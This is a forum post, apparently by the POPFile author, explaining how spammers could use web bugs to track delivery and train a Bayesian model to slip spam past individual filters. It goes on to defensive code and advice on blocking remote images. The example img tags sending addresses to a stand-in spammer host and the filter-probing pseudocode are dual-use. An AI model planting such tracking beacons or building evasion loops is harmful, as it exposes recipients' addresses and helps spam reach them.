UseTheSource
How to beat a Bayesian spam filter
posted by MCP on Monday May 19, @07:47AM Google velocity: 117 hours
OK, that's a pretty inflammatory title, and you might think that since my program POPFile is both Bayesian and used for spam fighting, I am crazy to publish a paper about how to get around a spam filter.

Or perhaps you just think I'm evil.

But it's essential that everyone thinks about not only how their spam filter works, but how it might be broken.

Here I describe a technique using email messages and web bugs that can be used to test for the presence of a spam filter and then examine its properties to see what types of spam are likely to get through.

The Problem (for a spammer)

Some antispam technologies (such as Spam Assassin) make it easy for a spammer to determine whether their message is going to be caught: they just run it through the program themselves (in Spam Assassin's case they also publish a nice list of how they catch spam on their web site which could be read as a HOWTO on what not to put in a spam message).

There are even companies like XXX that offer a service to people who want to send out mail and get it past spam filters. They'll check the message for you.

But Bayesian filters present a problem for the spammer... they are not one-size-fits-all programs that anyone can run. They are tailored by each individual and they learn as spam is received.

So the spammer is left with no defense against the spam filter, which is why Bayesian filters are both popular and successful. They catch spam and they make it hard for a spammer to figure out how to get their message to you.

Web Bugs

The key question a spammer wants answered is "did my message get through?" Luckily for them, the use of HTML in email and the automatic display of that HTML give them a way to answer it.

Currently web bugs are used to validate your email address. They help a spammer know which email addresses work and which should be junked, and they work even though the spammer has forged the return address on the email.

A web bug is a tiny (often invisible) image that is part of the spam messages that you receive. In HTML it could look something like this:

<img src=http://www.spammer-controlled-site.com/webbug.cgi?email=ABCDEF>

The email program will go to www.spammer-controlled-site.com and request the image called webbug.cgi?email=ABCDEF. The site responds with a tiny image (often white and 1 pixel by 1 pixel) but also makes a note of the email address (your real email address would replace ABCDEF in the example). The instant that you look at the spam, the spammer knows that your email address is valid and, boom, you get more spam.

Web Bugs Can Track Filter Hopping

It's pretty easy to see that once a web bug fires the spammer can use it to pass back any information that they want. One possibility would be to give every spam they send out a unique number and have a web bug like this:

<img src=http://www.spammer-controlled-site.com/webbug.cgi?email=ABCDEF&id=12345>

The ABCDEF is the email address of the recipient and the 12345 is the unique number of this specific message. When the spam is loaded the spammer can track which people received exactly which messages.
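
To see just how much a single image request gives away, here is a minimal sketch in Python that decodes the query string of a web bug URL like the one above. The function name decode_web_bug is my own invention for illustration; the parsing calls come from Python's standard urllib.parse module.

```python
from urllib.parse import urlsplit, parse_qs


def decode_web_bug(url: str) -> dict:
    """Return the query parameters that a web bug URL carries back to its server."""
    query = urlsplit(url).query
    # parse_qs maps each key to a list of values; keep the first value of each.
    return {key: values[0] for key, values in parse_qs(query).items()}


# Example URL taken from the text; ABCDEF stands in for a real address.
bug = "http://www.spammer-controlled-site.com/webbug.cgi?email=ABCDEF&id=12345"
leaked = decode_web_bug(bug)
print(leaked)
```

Everything after the question mark reaches the remote server the moment the image is requested, whether or not the reader ever notices the image.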

So you can imagine a process where a spammer sends a message to a specific recipient and then tracks the firing of the web bug to see whether the spam passed through the recipient's spam filter.

That process could even look like a long-running function call. Imagine that such a function exists and call it filter-test. It might be defined like this:

bool filter-test( EMAIL_ADDRESS to, EMAIL_ID number )

A spammer would call filter-test with an email address to send the message to, and the unique number of the message. filter-test would send the message to the recipient with the specially designed web bug inside it, wait for a response (with a timeout) and then return true if the message passed through the filter.

In pseudocode filter-test looks like this:

bool filter-test( EMAIL_ADDRESS to, EMAIL_ID number ) 
{
    Retrieve the unique email with id number
    Add the web bug
        <img src=http://www.spammer-controlled-site.com/
                               webbug.cgi?email=to&id=number>
    Send the email with recipient 'to'
    Wait for the web bug to fire
       If it fires then return true
       If after some timeout period it does not fire return false
}

So now the spammer can use filter-test to send a sequence of emails and get back yes/no responses that give a fuzzy idea of what happened. A yes means that the message got through, a no means that perhaps it didn't get through, or perhaps the user is on vacation, or perhaps the user is behind a firewall.

Fortunately, there are good machine learning algorithms for dealing with fuzzy information and making decisions from it. One such algorithm is, well, Bayes' rule.
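
As a rough illustration of why a "no" is only fuzzy evidence, the following Python sketch applies Bayes' rule to a single web bug that did not fire. The function name and the numbers are assumptions I have picked for the example, not measurements: a 50% prior that the message was filtered, and a 60% chance that a delivered message actually fires its web bug (the rest being vacations, firewalls and image blocking).

```python
def posterior_filtered(prior_filtered: float, p_fire_if_delivered: float) -> float:
    """P(message was filtered | web bug stayed silent), by Bayes' rule."""
    # Assumption: a filtered message is never displayed, so its bug never fires.
    p_silent_if_filtered = 1.0
    # A delivered message can still stay silent (vacation, firewall, images off).
    p_silent_if_delivered = 1.0 - p_fire_if_delivered
    numerator = p_silent_if_filtered * prior_filtered
    evidence = numerator + p_silent_if_delivered * (1.0 - prior_filtered)
    return numerator / evidence


# Hypothetical inputs: 50% prior, 60% of delivered messages fire the bug.
belief = posterior_filtered(prior_filtered=0.5, p_fire_if_delivered=0.6)
print(round(belief, 3))
```

With these made-up inputs, one silent web bug moves the belief that the message was filtered from 0.5 to about 0.714, which is suggestive but far from certain. The fewer delivered messages that fire their bug, the less a silence tells anyone.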

Bayes fights Bayes

What the spammer needs is a way of telling whether a message is likely to get past your individual spam filter. What the user of a Bayesian filter has is an adaptive mechanism for assigning a likelihood that a message is spam.

So what a spammer really needs is a Bayesian filter that is trained based on an individual end user's acceptance or non-acceptance of various spam messages. With such a program the spammer could test new spam messages to see whether they are likely to get through.

To make this work the spammer sets up a Bayesian learning system like POPFile with go and no go categories. Messages are placed in go if they were received by the end user and in no go if they were not. Using filter-test and a handful of sample mails the spammer can automatically build the corpus for go and no go and keep it up to date over time.

As new spam campaigns are created the spammer uses the Bayesian system by asking it how it would classify the new message they are about to send. If it looks like a go then it gets sent, if a no go then the message is tweaked (perhaps automatically) until it's a go. As the campaign progresses the spammer can use feedback from filter-test on the campaign mails to further refine the corpus.
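
The go / no go machinery is nothing exotic: it is the same two-bucket naive Bayes classification that a personal spam filter performs. The sketch below is a toy version in Python with add-one smoothing. It is not POPFile's actual code, and the class name, method names and sample texts are all made up for illustration.

```python
import math
from collections import Counter


class TwoBucketBayes:
    """Toy naive Bayes text classifier with add-one smoothing."""

    def __init__(self, buckets=("go", "no go")):
        self.words = {bucket: Counter() for bucket in buckets}
        self.messages = {bucket: 0 for bucket in buckets}

    def train(self, bucket: str, text: str) -> None:
        """Add one message's words to the corpus of the given bucket."""
        self.words[bucket].update(text.lower().split())
        self.messages[bucket] += 1

    def classify(self, text: str) -> str:
        """Return the bucket with the highest log-probability for the text."""
        vocabulary = set().union(*self.words.values())
        total_messages = sum(self.messages.values())
        scores = {}
        for bucket, counts in self.words.items():
            # Smoothed log prior for the bucket.
            score = math.log(
                (self.messages[bucket] + 1) / (total_messages + len(self.words))
            )
            total_words = sum(counts.values())
            for word in text.lower().split():
                # Smoothed log likelihood; unseen words get a small nonzero weight.
                score += math.log(
                    (counts[word] + 1) / (total_words + len(vocabulary) + 1)
                )
            scores[bucket] = score
        return max(scores, key=scores.get)


# Made-up training data standing in for the two corpora.
model = TwoBucketBayes()
model.train("go", "meeting notes attached")
model.train("go", "lunch tomorrow")
model.train("no go", "cheap pills online")
model.train("no go", "cheap offer now")
print(model.classify("cheap pills"))
print(model.classify("lunch meeting"))
```

The point of the toy is that the classifier is only as good as its corpus, and the corpus here can only be built from feedback about which messages were seen.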

Stopping the Arms Race

There's a simple solution to this Bayes vs. Bayes arms race: cut spammers out of the feedback loop. Doing that means stopping web bugs, never replying to spammers' mails and never bouncing spams.

If spammers cannot get feedback on whether their mails are being read, they can't refine their messages and Bayesian spam filters will remain successful. Practically speaking, that means you should not bounce spam, reply to it, or click on unsubscribe links. You should also disable the loading of images by your email client (or even disable HTML email altogether).
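
If you want to check a message before letting a mail client render it, a small script can list the images that would be fetched from a remote server. This is a minimal sketch using Python's standard html.parser module. The names RemoteImageFinder and find_remote_images are hypothetical, and it only looks at img tags, so treat it as a starting point rather than a complete defense.

```python
from html.parser import HTMLParser


class RemoteImageFinder(HTMLParser):
    """Collect the src of every <img> tag that points at a remote server."""

    REMOTE_PREFIXES = ("http://", "https://", "//")

    def __init__(self):
        super().__init__()
        self.remote_sources = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        for name, value in attrs:
            # value is None for attributes written without a value.
            if name == "src" and value and value.lower().startswith(self.REMOTE_PREFIXES):
                self.remote_sources.append(value)


def find_remote_images(html: str) -> list:
    """Return the remote image URLs that rendering this HTML would request."""
    finder = RemoteImageFinder()
    finder.feed(html)
    finder.close()
    return finder.remote_sources


# Sample body: one web bug and one image embedded in the message itself.
sample = (
    "<p>Hello</p>"
    '<img src="http://www.spammer-controlled-site.com/webbug.cgi?email=ABCDEF">'
    '<img src="cid:logo">'
)
suspects = find_remote_images(sample)
print(suspects)
```

Images referenced with cid: travel inside the message and do not phone home, which is why only the http, https and protocol-relative sources are reported.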

    2 comments
    Block webbugs and then post them (Score:0)
    by Anonymous Coward on Monday May 19, @01:25PM EST (#1)
    I use mutt to avoid all webbugs, but I suggest you give spammers false positives by fetching the image sources for all kinds of user-ids, such as "uce@ftc.gov". You would probably need to obfuscate the source IP of the client, unfortunately.
    Spammers won't care about POPFile (Score:1)
    by plover on Friday June 13, @04:15PM EST (#2)
    I don't think spammers care about Bayesian filters, or any "single-user" filtering scheme. Getting spam out to "one more user" is not profitable. It's too expensive to work on a machine-by-machine level. It defeats the goal of spam, which is to claim to have sent an email to 1 million users. Getting spam past the big mechanized spam filters at the ISP level is the spammers' true goal.

    Many (most) people sign up with their ISPs to use a spam filter. Only a handful of dedicated fanatics are savvy enough to run a personal filter. (OK, it may be a million people, but with a billion online it's still less than a percent.) Spammers can't afford to hack each individual machine's filter. They'll run a copy of Spam Assassin and tweak their messages to get past the ISPs' filters, sure, but they're not after POPFile or any specific Bayesian filter. It's just too expensive.

    As an aside, I think the web bugs may have two purposes: not only do they validate addresses as live, but I think they provide "proof of receipt" to the spammers' customers who are paying for the crap.

    This brings up another related point: for the most part, spammers really don't care if you read their mail or buy their products. The spammer makes his or her money by fleecing shady and quasi-legitimate businesses, not by selling HGH or Viagra online. Remember, there are two external parties involved in any spam: those who are selling crap, and those who are selling email advertising services. The spammers promise to send out a million ads for $299.95. KingPager@beepers.r.us is trying to sell beepers, but is simply too stupid to understand that while he's cursing "spam" at home, he's enriching Ralsky for an "effective online advertising campaign." He doesn't understand that when he clicks delete, so does EVERYONE else.

    Spam pays only the spammer. People say that spam works because 0.1% of people buy the advertised product. I don't believe that figure for a second. I doubt that even 0.001% of the spam generates sales. At that rate a million emails produce 10 sales, so if you're paying $300 for a million emails, you'd better be making $30 profit per sale. That's hard when you're selling schlock like counterfeit copies of Norton Systemworks at $19.99 a pop.

    (The sole exception would be spam for free online pr0n, as they get paid by the advertisers for eyeballs, and free pr0n ALWAYS gets eyeballs.)

    So, the victims of spam are at least twofold: us, the unlucky recipients of the crap; and the stupid business owners who fall for the "Make money fast by advertising in email" pitch. But the Ralskys truly "make money fast."
